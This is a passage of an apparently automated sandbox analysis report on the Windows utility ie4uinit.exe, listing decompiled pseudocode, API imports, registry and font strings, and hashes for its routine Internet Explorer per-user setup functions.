				__imp__#158();
				if (_t136 == 0) goto 0x319c1f89;
				r14b = r15b;
				 *((intOrPtr*)(_t257 + 0x30)) = r12d;
				memset(??, ??, ??);
				 *((long long*)(_t257 + 0x28)) = _t257 + 0x30;
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t257 + 0x20)) = _t254 + 0x1c0;
				_t138 = RegQueryValueExW(??, ??, ??, ??, ??, ??); // executed
				if (_t138 != 0) goto 0x319c1ffc;
				if ( *((intOrPtr*)(_t257 + 0x30)) + 0xfffffffe - 0x3d > 0) goto 0x319c1ffc;
				__imp__StrCmpIW();
				_t155 =  !=  ? r15d : dil & 0xffffffff;
				_t141 = RegCloseKey(_t253);
				r9d = 3;
				E00007FF77FF7319C1394(_t141, _t254 + 0x250, _t278, L"%u", L"software\\microsoft\\Internet Explorer\\International\\Scripts");
				if (r14b == 0) goto 0x319c2062;
				 *((intOrPtr*)(_t257 + 0x20)) = r13d;
				if (E00007FF77FF7319C6890(0, _t254 + 0x1c0, _t254 + 0x250, _t254 + 0x200, _t275) < 0) goto 0x319c2062;
				E00007FF77FF7319C6930(_t254 + 0x1c0, _t278, _t254 + 0x250, _t254 + 0x200); // executed
				if (dil == 0) goto 0x319c20a4;
				 *((intOrPtr*)(_t257 + 0x20)) = r13d;
				if (E00007FF77FF7319C6890(0, _t254 + 0x1c0, _t254 + 0x250, _t254 + 0x200, _t275) < 0) goto 0x319c20a4;
				_t146 = E00007FF77FF7319C6930(_t254 + 0x1c0, _t278, _t254 + 0x250, _t254 + 0x200); // executed
				if (4 - 0x28 < 0) goto 0x319c1ea7;
				return E00007FF77FF7319E38D0(_t146, _t150,  *(_t254 + 0xad0) ^ _t257);
			}

0x7ff7319c1b44
0x7ff7319c1b47
0x7ff7319c1b4b
0x7ff7319c1b4f
0x7ff7319c1b5c
0x7ff7319c1b63
0x7ff7319c1b6a
0x7ff7319c1b74
0x7ff7319c1b7b
0x7ff7319c1b81
0x7ff7319c1b88
0x7ff7319c1b90
0x7ff7319c1b97
0x7ff7319c1b9c
0x7ff7319c1ba3
0x7ff7319c1ba8
0x7ff7319c1baf
0x7ff7319c1bb4
0x7ff7319c1bbb
0x7ff7319c1bc0
0x7ff7319c1bce
0x7ff7319c1bd3
0x7ff7319c1bd7
0x7ff7319c1be5
0x7ff7319c1be9
0x7ff7319c1bed
0x7ff7319c1bfb
0x7ff7319c1bff
0x7ff7319c1c03
0x7ff7319c1c11
0x7ff7319c1c15
0x7ff7319c1c19
0x7ff7319c1c27
0x7ff7319c1c2b
0x7ff7319c1c2f
0x7ff7319c1c3d
0x7ff7319c1c41
0x7ff7319c1c45
0x7ff7319c1c53
0x7ff7319c1c57
0x7ff7319c1c5b
0x7ff7319c1c69
0x7ff7319c1c6d
0x7ff7319c1c71
0x7ff7319c1c7f
0x7ff7319c1c83
0x7ff7319c1c87
0x7ff7319c1c95
0x7ff7319c1c99
0x7ff7319c1c9d
0x7ff7319c1ca7
0x7ff7319c1cad
0x7ff7319c1cb8
0x7ff7319c1cc3
0x7ff7319c1cce
0x7ff7319c1cd9
0x7ff7319c1ce4
0x7ff7319c1ce8
0x7ff7319c1cef
0x7ff7319c1cf6
0x7ff7319c1cfd
0x7ff7319c1d04
0x7ff7319c1d12
0x7ff7319c1d20
0x7ff7319c1d24
0x7ff7319c1d28
0x7ff7319c1d2c
0x7ff7319c1d30
0x7ff7319c1d34
0x7ff7319c1d38
0x7ff7319c1d3c
0x7ff7319c1d44
0x7ff7319c1d52
0x7ff7319c1d60
0x7ff7319c1d6e
0x7ff7319c1d7c
0x7ff7319c1d8a
0x7ff7319c1d98
0x7ff7319c1da6
0x7ff7319c1db4
0x7ff7319c1dc2
0x7ff7319c1dd0
0x7ff7319c1dde
0x7ff7319c1dec
0x7ff7319c1dfa
0x7ff7319c1e08
0x7ff7319c1e16
0x7ff7319c1e22
0x7ff7319c1e30
0x7ff7319c1e37
0x7ff7319c1e3a
0x7ff7319c1e41
0x7ff7319c1e48
0x7ff7319c1e48
0x7ff7319c1e4c
0x7ff7319c1e53
0x7ff7319c1e53
0x7ff7319c1e57
0x7ff7319c1e5e
0x7ff7319c1e68
0x7ff7319c1e6f
0x7ff7319c1e76
0x7ff7319c1e7d
0x7ff7319c1e84
0x7ff7319c1e8b
0x7ff7319c1e92
0x7ff7319c1e99
0x7ff7319c1ea0
0x7ff7319c1eae
0x7ff7319c1ec5
0x7ff7319c1ecf
0x7ff7319c1ed2
0x7ff7319c1ed8
0x7ff7319c1edd
0x7ff7319c1eee
0x7ff7319c1ef1
0x7ff7319c1ef9
0x7ff7319c1f0b
0x7ff7319c1f1a
0x7ff7319c1f2d
0x7ff7319c1f32
0x7ff7319c1f35
0x7ff7319c1f3a
0x7ff7319c1f3d
0x7ff7319c1f45
0x7ff7319c1f4b
0x7ff7319c1f51
0x7ff7319c1f5f
0x7ff7319c1f67
0x7ff7319c1f6c
0x7ff7319c1f7c
0x7ff7319c1f84
0x7ff7319c1f86
0x7ff7319c1f8c
0x7ff7319c1f9a
0x7ff7319c1fa9
0x7ff7319c1fbc
0x7ff7319c1fbf
0x7ff7319c1fc2
0x7ff7319c1fc7
0x7ff7319c1fcf
0x7ff7319c1fdb
0x7ff7319c1fec
0x7ff7319c1ff8
0x7ff7319c2001
0x7ff7319c2007
0x7ff7319c201b
0x7ff7319c2023
0x7ff7319c202c
0x7ff7319c2046
0x7ff7319c205d
0x7ff7319c2065
0x7ff7319c206e
0x7ff7319c2088
0x7ff7319c209f
0x7ff7319c20ad
0x7ff7319c20e2

APIs

Part of subcall function 00007FF7319C1394: _vsnwprintf.MSVCRT ref: 00007FF7319C13D4

RegOpenKeyExW.KERNEL32 ref: 00007FF7319C1EF1
memset.MSVCRT ref: 00007FF7319C1F0B
RegQueryValueExW.KERNEL32 ref: 00007FF7319C1F3D
StrCmpIW.SHLWAPI ref: 00007FF7319C1F5F
StrCmpICW.SHLWAPI ref: 00007FF7319C1F7C
memset.MSVCRT ref: 00007FF7319C1F9A
RegQueryValueExW.KERNEL32 ref: 00007FF7319C1FC7
StrCmpIW.SHLWAPI ref: 00007FF7319C1FEC
RegCloseKey.ADVAPI32 ref: 00007FF7319C2001

Strings

PMingLiu, xrefs: 00007FF7319C1CD2
Sylfaen, xrefs: 00007FF7319C1B90, 00007FF7319C1D0B, 00007FF7319C1DE5
Iskoola Pota, xrefs: 00007FF7319C1C19
MS Gothic, xrefs: 00007FF7319C1E01
Nyala, xrefs: 00007FF7319C1BC0
%s\%u, xrefs: 00007FF7319C1EB2
MingLiu, xrefs: 00007FF7319C1E0F
Latha, xrefs: 00007FF7319C1C62, 00007FF7319C1D9F
Mongolian Baiti, xrefs: 00007FF7319C1C87
DokChampa, xrefs: 00007FF7319C1BA8
Simplified Arabic, xrefs: 00007FF7319C1BDE
Times New Roman, xrefs: 00007FF7319C1B81
Myanmar Text, xrefs: 00007FF7319C1C45
Mangal, xrefs: 00007FF7319C1BF4, 00007FF7319C1D59
IEPropFontName, xrefs: 00007FF7319C1F1F
Tunga, xrefs: 00007FF7319C1C8E, 00007FF7319C1DBB
NSimsun, xrefs: 00007FF7319C1E29
Simplified Arabic Fixed, xrefs: 00007FF7319C1D4B
Courier New, xrefs: 00007FF7319C1CE8
Vrinda, xrefs: 00007FF7319C1C0A, 00007FF7319C1D67
David, xrefs: 00007FF7319C1F6E
MV Boli, xrefs: 00007FF7319C1C71
Segoe UI Symbol, xrefs: 00007FF7319C1B9C
MS PGothic, xrefs: 00007FF7319C1CC7
Microsoft Yi Baiti, xrefs: 00007FF7319C1C03
Estrangelo Edessa, xrefs: 00007FF7319C1C2F
Miriam Fixed, xrefs: 00007FF7319C1D19
Kalinga, xrefs: 00007FF7319C1C4C, 00007FF7319C1D91
Gautami, xrefs: 00007FF7319C1C78, 00007FF7319C1DAD
Plantagenet Cherokee, xrefs: 00007FF7319C1BED
Microsoft Himalaya, xrefs: 00007FF7319C1BB4
DaunPenh, xrefs: 00007FF7319C1C5B
GulimChe, xrefs: 00007FF7319C1DF3
Shruti, xrefs: 00007FF7319C1C36, 00007FF7319C1D83
Simsun, xrefs: 00007FF7319C1CDD
software\microsoft\Internet Explorer\International\Scripts, xrefs: 00007FF7319C1EA7
Arial, xrefs: 00007FF7319C1BC7
Euphemia, xrefs: 00007FF7319C1BD7
Gulim, xrefs: 00007FF7319C1CBC
Tahoma, xrefs: 00007FF7319C1CB1, 00007FF7319C1DD7
Raavi, xrefs: 00007FF7319C1C20, 00007FF7319C1D75
IEFixedFontName, xrefs: 00007FF7319C1FAE
Kartika, xrefs: 00007FF7319C1CA0, 00007FF7319C1DC9

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: QueryValuememset$CloseOpen_vsnwprintf
String ID: %s\%u$Arial$Courier New$DaunPenh$David$DokChampa$Estrangelo Edessa$Euphemia$Gautami$Gulim$GulimChe$IEFixedFontName$IEPropFontName$Iskoola Pota$Kalinga$Kartika$Latha$MS Gothic$MS PGothic$MV Boli$Mangal$Microsoft Himalaya$Microsoft Yi Baiti$MingLiu$Miriam Fixed$Mongolian Baiti$Myanmar Text$NSimsun$Nyala$PMingLiu$Plantagenet Cherokee$Raavi$Segoe UI Symbol$Shruti$Simplified Arabic$Simplified Arabic Fixed$Simsun$Sylfaen$Tahoma$Times New Roman$Tunga$Vrinda$software\microsoft\Internet Explorer\International\Scripts
API String ID: 3838326566-3455815564
Opcode ID: ea2c4cd55de5f69f62d05c09edb601479f9c9b9d373f2d36c032263ceb11b70f
Instruction ID: 65efef3420537174492c202d4d6898d392299eef7bc3751f515437bab2da5192
Opcode Fuzzy Hash: ea2c4cd55de5f69f62d05c09edb601479f9c9b9d373f2d36c032263ceb11b70f
Instruction Fuzzy Hash: 55F1C832A19FC2A9E721DF60EC806D977A8FB4434CF904136DA8C16B68DF78D255D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C20E4 Relevance: 63.2, APIs: 24, Strings: 12, Instructions: 228
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32 ref: 00007FF7319C2145
SHCopyKeyW.SHLWAPI ref: 00007FF7319C2165
RegCloseKey.KERNEL32 ref: 00007FF7319C2170
GetSystemDirectoryW.KERNEL32 ref: 00007FF7319C2189
LoadLibraryW.KERNEL32 ref: 00007FF7319C21BB
GetProcAddress.KERNEL32 ref: 00007FF7319C21D3
FreeLibrary.KERNEL32 ref: 00007FF7319C21E7
#33.IERTUTIL ref: 00007FF7319C21ED
SHFlushSFCache.SHELL32 ref: 00007FF7319C21F8
_time64.MSVCRT ref: 00007FF7319C2202
SHRegSetUSValueW.SHLWAPI ref: 00007FF7319C2232
memset.MSVCRT ref: 00007FF7319C2244
GetModuleHandleW.KERNEL32 ref: 00007FF7319C2252
GetModuleFileNameW.KERNEL32 ref: 00007FF7319C2268
PathFileExistsW.SHLWAPI ref: 00007FF7319C22B5
ExecuteCabW.IEADVPACK ref: 00007FF7319C22E8
GetModuleHandleW.KERNEL32 ref: 00007FF7319C22F2
ShellMessageBoxW.SHLWAPI ref: 00007FF7319C231A
RegCreateKeyExW.KERNEL32 ref: 00007FF7319C2431
RegCreateKeyExW.KERNEL32 ref: 00007FF7319C2476
RegQueryValueExW.KERNEL32 ref: 00007FF7319C24AE
RegSetValueExW.KERNELBASE ref: 00007FF7319C24DA
RegCloseKey.ADVAPI32 ref: 00007FF7319C24E5
RegCloseKey.ADVAPI32 ref: 00007FF7319C24F0

Strings

SOFTWARE\Microsoft\Internet Explorer\Unattend\New Windows, xrefs: 00007FF7319C2154
Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF7319C2406
ShellFolder, xrefs: 00007FF7319C244E
DefaultInstall.Windows7, xrefs: 00007FF7319C22D8
mydocs.dll, xrefs: 00007FF7319C2198
SOFTWARE\Microsoft\Internet Explorer\New Windows, xrefs: 00007FF7319C211B
Attributes, xrefs: 00007FF7319C248F, 00007FF7319C24C4
InstallDate, xrefs: 00007FF7319C2224
@, xrefs: 00007FF7319C2312
PerUserInit, xrefs: 00007FF7319C21C9
ieuinit.inf, xrefs: 00007FF7319C2297
Software\Microsoft\Internet Explorer\SQM, xrefs: 00007FF7319C222B

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseCreateModuleValue$FileHandleLibrary$AddressCacheCopyDirectoryExecuteExistsFlushFreeLoadMessageNamePathProcQueryShellSystem_time64memset
String ID: @$Attributes$DefaultInstall.Windows7$InstallDate$PerUserInit$SOFTWARE\Microsoft\Internet Explorer\New Windows$SOFTWARE\Microsoft\Internet Explorer\Unattend\New Windows$ShellFolder$Software\Microsoft\Internet Explorer\SQM$Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}$ieuinit.inf$mydocs.dll
API String ID: 1390537773-2640647115
Opcode ID: 47a474eeead17778a51976afd37e10ab335df0b82b775577c64414a2b4aa26e7
Instruction ID: 985abc4877e8cdc0a2cd0bc2aaaf7f9eede0150d1bbd5dba8c734fe2f1423fc5
Opcode Fuzzy Hash: 47a474eeead17778a51976afd37e10ab335df0b82b775577c64414a2b4aa26e7
Instruction Fuzzy Hash: 2FC15531E0CBC2A6EB10AF65E8506A9B764FB84798F805135DA8D47A6CDFBCD144DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C2DFC Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 225
commemorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EventRegister.ADVAPI32 ref: 00007FF7319C2E77
EventSetInformation.ADVAPI32 ref: 00007FF7319C2E96
InitOnceExecuteOnce.KERNEL32 ref: 00007FF7319C2EB0
rand_s.MSVCRT ref: 00007FF7319C2EDB
VirtualAlloc.KERNEL32 ref: 00007FF7319C2F07
HeapSetInformation.KERNEL32 ref: 00007FF7319C2F2B
OleInitializeWOW.OLE32 ref: 00007FF7319C2F33
SetErrorMode.KERNEL32 ref: 00007FF7319C2F46
CommandLineToArgvW.SHELL32 ref: 00007FF7319C2F59
memset.MSVCRT ref: 00007FF7319C2F9F
CreateEventW.KERNEL32 ref: 00007FF7319C2FCD
CreateThread.KERNEL32 ref: 00007FF7319C3007
WaitForSingleObject.KERNEL32 ref: 00007FF7319C3023
FindCloseChangeNotification.KERNEL32 ref: 00007FF7319C302E
StrCmpNIW.SHLWAPI ref: 00007FF7319C3087
LocalFree.KERNEL32 ref: 00007FF7319C30EB
GetLastError.KERNEL32 ref: 00007FF7319C313A
OleUninitialize.OLE32 ref: 00007FF7319C314E
EventUnregister.ADVAPI32 ref: 00007FF7319C3184

Strings

ie4uInit.exe exiting. Process Result: 0x%1!08lx!======================================================, xrefs: 00007FF7319C315E
Starting ie4uinit.exe. Command Line:%1!lS!, xrefs: 00007FF7319C3037
Executing Command: %1!lS!, xrefs: 00007FF7319C3102
Command Result: 0x%1!08lx!, xrefs: 00007FF7319C3123
ie4uinit%s.log, xrefs: 00007FF7319C2FAE

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Event$CreateErrorInformationOnce$AllocArgvChangeCloseCommandExecuteFindFreeHeapInitInitializeLastLineLocalModeNotificationObjectRegisterSingleThreadUninitializeUnregisterVirtualWaitmemsetrand_s
String ID: Command Result: 0x%1!08lx!$Executing Command: %1!lS!$Starting ie4uinit.exe. Command Line:%1!lS!$ie4uInit.exe exiting. Process Result: 0x%1!08lx!======================================================$ie4uinit%s.log
API String ID: 1538871842-118140733
Opcode ID: 7ed3ed8e349587e55599ac17f7f15e2c987c568425f82e2e2b8a364bc8ae47e4
Instruction ID: 04d55d78ac0d7fac4a6e037cf1b671e8b2a86063ea92bf38ddbe0fa94b6aa376
Opcode Fuzzy Hash: 7ed3ed8e349587e55599ac17f7f15e2c987c568425f82e2e2b8a364bc8ae47e4
Instruction Fuzzy Hash: 7AB18E31E1CAC2E1EB00EF15E8805A9B760FB48789FC05035D98D57668DFBCE545EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CB0DC Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7319CB410: LocaleNameToLCID.KERNEL32(?,?,00000000,00007FF7319CB0F8), ref: 00007FF7319CB41F

GetSystemInfo.KERNEL32 ref: 00007FF7319CB105
#701.IERTUTIL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,00007FF7319C232A), ref: 00007FF7319CB130
IsJITInProgress.URLMON ref: 00007FF7319CB187
GetSystemInfo.KERNEL32 ref: 00007FF7319CB19C
IsJITInProgress.URLMON ref: 00007FF7319CB1B1
#701.IERTUTIL ref: 00007FF7319CB1D5
IsJITInProgress.URLMON ref: 00007FF7319CB20B

Part of subcall function 00007FF7319CB564: #701.IERTUTIL ref: 00007FF7319CB574

LocaleNameToLCID.KERNEL32 ref: 00007FF7319CB250
IsJITInProgress.URLMON ref: 00007FF7319CB26F
IsJITInProgress.URLMON ref: 00007FF7319CB283
EnterCriticalSection.KERNEL32 ref: 00007FF7319CB295
LeaveCriticalSection.KERNEL32 ref: 00007FF7319CB2AF

Strings

!x-sys-default-locale, xrefs: 00007FF7319CB249

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Progress$#701$CriticalInfoLocaleNameSectionSystem$EnterLeave
String ID: !x-sys-default-locale
API String ID: 3643492158-2729719199
Opcode ID: 598cb1cc18d71b4b703e7d5bc3462d6b3f2da086a651af043802d8819f626bcf
Instruction ID: 479ab8ee63e3b3d153a6f0a38d3a83d1651cb1491dd2b37af27661e132b55183
Opcode Fuzzy Hash: 598cb1cc18d71b4b703e7d5bc3462d6b3f2da086a651af043802d8819f626bcf
Instruction Fuzzy Hash: 0851F011E8D6C2B2FB547B60A854279E391AFA578DFC44034C8CE431AEDEAD6845EB31

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C2930 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
processCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E00007FF77FF7319C2930() {
				int _t35;
				void* _t41;
				void* _t49;
				void* _t50;
				signed long long _t55;
				signed long long _t56;
				long long _t59;
				void* _t72;
				long long _t75;
				long long _t76;
				void* _t77;
				void* _t78;
				signed long long _t79;
				void* _t81;
				void* _t84;
				void* _t85;

				_t77 = _t78 - 0x200;
				_t79 = _t78 - 0x300;
				_t55 =  *0x319f4658; // 0x8be7dd1f02a
				_t56 = _t55 ^ _t79;
				 *(_t77 + 0x1f0) = _t56;
				E00007FF77FF7319C5974(0x319f4348, L"In CmdOldUserInstall\n", _t81, _t84); // executed
				r9d = 0;
				r8b = 1; // executed
				E00007FF77FF7319CA568(_t49, _t59, 0x319f4260, L"In CmdOldUserInstall\n", _t75, _t76, _t84); // executed
				E00007FF77FF7319CA854(_t41, 0, _t49, _t50, _t59, L"In CmdOldUserInstall\n", _t75, _t76, _t81, _t84, _t85); // executed
				E00007FF77FF7319C5974(0x319f4348, L"In CmdClearIconCacheOnStartup\n", _t81, _t84); // executed
				r8d = 0x104;
				_t72 = _t77 - 0x20;
				if (GetModuleFileNameW(??, ??, ??) == 0) goto 0x319c2a43;
				if (E00007FF77FF7319C31CC(_t59, _t77 - 0x20, _t72, L" -ClearIconCache") < 0) goto 0x319c2a43;
				_t6 = _t72 + 0x68; // 0x68
				r8d = _t6;
				memset(??, ??, ??);
				 *((intOrPtr*)(_t79 + 0x70)) = 0x68;
				 *(_t79 + 0x50) = _t56;
				 *(_t79 + 0x58) = _t56;
				r9d = 0;
				 *(_t79 + 0x60) = _t56;
				r8d = 0;
				 *((long long*)(_t79 + 0x48)) = _t79 + 0x50;
				 *((long long*)(_t79 + 0x40)) = _t79 + 0x70;
				 *(_t79 + 0x38) =  *(_t79 + 0x38) & 0x00000000;
				 *(_t79 + 0x30) =  *(_t79 + 0x30) & 0x00000000;
				 *(_t79 + 0x28) =  *(_t79 + 0x28) & 0x00000000;
				 *(_t79 + 0x20) =  *(_t79 + 0x20) & 0x00000000;
				_t35 = CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
				if (_t35 == 0) goto 0x319c2a43;
				CloseHandle(??);
				CloseHandle(??); // executed
				E00007FF77FF7319C20E4(_t59, _t75, _t76, _t84, _t85); // executed
				__imp__SHDeleteKeyW(); // executed
				r9d = 0;
				__imp__BrandIEActiveSetup(); // executed
				return E00007FF77FF7319E38D0(0, 0,  *(_t77 + 0x1f0) ^ _t79);
			}

0x7ff7319c2932
0x7ff7319c293a
0x7ff7319c2941
0x7ff7319c2948
0x7ff7319c294b
0x7ff7319c2960
0x7ff7319c2965
0x7ff7319c296f
0x7ff7319c2972
0x7ff7319c2979
0x7ff7319c298c
0x7ff7319c2991
0x7ff7319c2997
0x7ff7319c29a5
0x7ff7319c29c2
0x7ff7319c29cb
0x7ff7319c29cb
0x7ff7319c29cf
0x7ff7319c29d6
0x7ff7319c29de
0x7ff7319c29e7
0x7ff7319c29ec
0x7ff7319c29ef
0x7ff7319c29f4
0x7ff7319c29fe
0x7ff7319c2a08
0x7ff7319c2a0d
0x7ff7319c2a13
0x7ff7319c2a19
0x7ff7319c2a1e
0x7ff7319c2a23
0x7ff7319c2a2b
0x7ff7319c2a32
0x7ff7319c2a3d
0x7ff7319c2a43
0x7ff7319c2a56
0x7ff7319c2a5c
0x7ff7319c2a6a
0x7ff7319c2a89

APIs

Part of subcall function 00007FF7319C5974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C59AD
Part of subcall function 00007FF7319C5974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C5A1F
Part of subcall function 00007FF7319C5974: PostThreadMessageW.USER32 ref: 00007FF7319C5A39

Part of subcall function 00007FF7319CA568: SetFileAttributesW.KERNEL32 ref: 00007FF7319CA66D
Part of subcall function 00007FF7319CA568: wcscat_s.MSVCRT ref: 00007FF7319CA72C
Part of subcall function 00007FF7319CA568: wcscat_s.MSVCRT ref: 00007FF7319CA743
Part of subcall function 00007FF7319CA568: FindFirstFileW.KERNEL32 ref: 00007FF7319CA755

Part of subcall function 00007FF7319CA854: memset.MSVCRT ref: 00007FF7319CA8D8
Part of subcall function 00007FF7319CA854: #820.IERTUTIL ref: 00007FF7319CA8EE
Part of subcall function 00007FF7319CA854: CoTaskMemAlloc.OLE32 ref: 00007FF7319CA95F
Part of subcall function 00007FF7319CA854: CoTaskMemFree.OLE32 ref: 00007FF7319CA9CC

GetModuleFileNameW.KERNEL32 ref: 00007FF7319C299D
memset.MSVCRT ref: 00007FF7319C29CF
CreateProcessW.KERNEL32 ref: 00007FF7319C2A23
CloseHandle.KERNEL32 ref: 00007FF7319C2A32
CloseHandle.KERNEL32 ref: 00007FF7319C2A3D
SHDeleteKeyW.SHLWAPI ref: 00007FF7319C2A56
BrandIEActiveSetup.IEDKCS32 ref: 00007FF7319C2A6A

Strings

SIGNUP, xrefs: 00007FF7319C2A5F
In CmdClearIconCacheOnStartup, xrefs: 00007FF7319C297E
In CmdOldUserInstall, xrefs: 00007FF7319C2952
SOFTWARE\Microsoft\Active Setup\Installed Components\{2D46B6DC-2207-486B-B523-A557E6D54B47}, xrefs: 00007FF7319C2A48
h, xrefs: 00007FF7319C29D6
-ClearIconCache, xrefs: 00007FF7319C29AB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: File$CloseHandleMessageTaskmemsetwcscat_s$#820ActiveAllocAttributesBrandCreateDeleteFindFirstFormatFreeLocalModuleNamePostProcessSetupThreadTime
String ID: -ClearIconCache$In CmdClearIconCacheOnStartup$In CmdOldUserInstall$SIGNUP$SOFTWARE\Microsoft\Active Setup\Installed Components\{2D46B6DC-2207-486B-B523-A557E6D54B47}$h
API String ID: 2432925687-1244318026
Opcode ID: 3b5907ddf548447816f20d3863a5ec30cafbc192f3e9f89e56b350883b2703c1
Instruction ID: 605520cff3ab60a137fe4955cc33506698c0a2feae52e9ca80b6928ab2f36798
Opcode Fuzzy Hash: 3b5907ddf548447816f20d3863a5ec30cafbc192f3e9f89e56b350883b2703c1
Instruction Fuzzy Hash: 99314432E1CA82A6F710EB24E8503AAA3A0FB8875CFC05135D58D465ADDFBCD149DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CA568 Relevance: 16.7, APIs: 11, Instructions: 190
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF7319CA5E8
SetFileAttributesW.KERNEL32 ref: 00007FF7319CA66D
GetLastError.KERNEL32 ref: 00007FF7319CA67F
SHGetFolderPathW.SHELL32 ref: 00007FF7319CA6F2
wcscat_s.MSVCRT ref: 00007FF7319CA713
wcscat_s.MSVCRT ref: 00007FF7319CA72C
wcscat_s.MSVCRT ref: 00007FF7319CA743
FindFirstFileW.KERNEL32 ref: 00007FF7319CA755
wcscat_s.MSVCRT ref: 00007FF7319CA7B3
FindNextFileW.KERNEL32 ref: 00007FF7319CA80F
FindClose.KERNEL32 ref: 00007FF7319CA824

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

